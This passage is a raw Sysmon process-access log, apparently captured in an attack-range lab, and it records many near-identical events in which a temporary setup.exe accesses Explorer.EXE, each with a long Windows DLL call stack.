13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.stora